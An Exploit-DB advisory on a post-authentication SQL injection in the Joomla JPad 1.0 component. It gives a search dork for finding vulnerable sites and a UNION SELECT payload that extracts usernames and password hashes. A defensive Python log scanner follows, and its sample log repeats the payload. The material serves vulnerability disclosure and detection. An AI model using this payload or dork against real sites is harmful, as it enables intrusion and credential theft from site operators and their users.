Joomla Component JPad 1.0 - SQL Injection Vulnerability postauth

2008-04-24T00:00:00
ID EDB-ID:5493
Type exploitdb
Reporter His0k4
Modified 2008-04-24T00:00:00

Description

Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth). CVE-2008-4715. Webapps exploit for php platform

#########################################################
#							#
#     Joomla Component JPad Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Found by : His0k4 (Algerian HaCkeR);
[*] Contact: His0k4[at]gmail.com
[*] Greetz : All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"


########################################

[*] DORK: allinurl:com_jpad

########################################

[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note : You have to register an account in the site.
########################################

side note:
  <name>JPad</name>
  <creationDate>31/06/2007</creationDate>
  <author>Theo van der Sluijs</author>
  <copyright>(c) 2007 VanderSluijs.nl</copyright>
  <authorEmail>theo@vandersluijs.nl</authorEmail>

  <authorUrl>www.vandersluijs.nl</authorUrl>
  <version>1.0</version>
  <description>Component to create notepad files. (see about)</description>

# milw0rm.com [2008-04-24]
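
A defender-side check for the request pattern in the P.O.C above, as an added example that is not part of the original advisory: it scans web access logs for com_jpad requests whose cid parameter is anything other than a plain integer. The log lines are constructed samples; the function name and the premise that legitimate cid values are non-negative integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real site.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Apr/2008:10:01:02 +0000] "GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=12 HTTP/1.1" 200 5120
198.51.100.9 - - [24/Apr/2008:10:03:44 +0000] "GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1%20UNION%20ALL%20SELECT%201,2,3,concat_ws(0x3a,username,password),5,6,7,8%20from%20jos_users-- HTTP/1.1" 200 6033
198.51.100.9 - - [24/Apr/2008:10:04:10 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9001
203.0.113.5 - - [24/Apr/2008:10:05:00 +0000] "GET /index.php?option=com_jpad&task=edit&Itemid=39&cid[]=7 HTTP/1.1" 200 5000
"""

# Request line inside the quoted field; ".+?" tolerates servers that log raw spaces.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')
# Assumption: a legitimate cid is a non-negative integer record id.
INT_RE = re.compile(r"\d+")


def suspicious_jpad_requests(log_text):
    """Return (client_ip, decoded_cid) for com_jpad requests with a non-integer cid."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared in clear.
        query = parse_qs(urlsplit(match.group("target")).query)
        if "com_jpad" not in query.get("option", []):
            continue
        # Check both the scalar and the array spelling of the parameter.
        for key in ("cid", "cid[]"):
            for value in query.get(key, []):
                if not INT_RE.fullmatch(value):
                    hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, cid in suspicious_jpad_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer cid to com_jpad: {cid!r}")
```

Only query strings are inspected, so a cid sent in a POST body will not appear in a standard access log and needs request-body logging or a WAF rule to catch.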